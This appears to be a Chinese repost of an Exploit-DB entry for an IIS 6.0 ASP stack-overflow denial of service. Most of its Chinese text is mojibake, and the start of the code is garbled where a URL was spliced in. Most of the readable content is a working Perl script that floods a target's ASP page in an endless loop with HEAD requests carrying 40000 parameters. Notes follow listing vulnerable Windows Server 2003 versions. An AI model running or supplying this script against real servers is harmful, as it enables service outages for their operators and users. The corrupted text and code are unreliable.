寰杞疘IS 6.0 ASP鍫嗘爤婧㈠嚭 鎷掔粷鏈嶅姟婕忔礊鍙婁慨澶

2023 年 8 月 11 日1210

鏀诲嚮鑰呭彂閫佷竴涓狿OST璇锋眰鍒癆SP椤碉紝鍦≒OST璇锋眰涓鍖呭惈澶т簬 40000璇锋眰鍙傛暟锛屽苟鍦ㄥ彂閫佹椂鐢▁-http://www.zjjv.com/e IO::Socket;
04.$|=1;
05.$host = $ARGV[0];
06.$script = $ARGV[1];
07.while(1) {
08.$sock = IO::Socket::INET->new(PeerAddr => $host,
09. PeerPort => http(80),
10. Proto => tcp);
11.$write = "C=A&" x 40000;
12.print $sock "HEAD /$script HTTP/1.1

Host: $host

"
13. ."Connection:Close

Content-Type: application/x-www-form-urlencoded

"
14. ."Content-Length:". length($write) ."

" . $write;
15.print ".";
16.while(<$sock>) {
17. print;
18.}
19.}
20.
21.
22.EDB Notes:
23.In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0

淇澶嶆柟妗堬細鍏虫敞寰杞鍗囩骇琛ヤ竵锛屽強鏃跺崌绾

0 0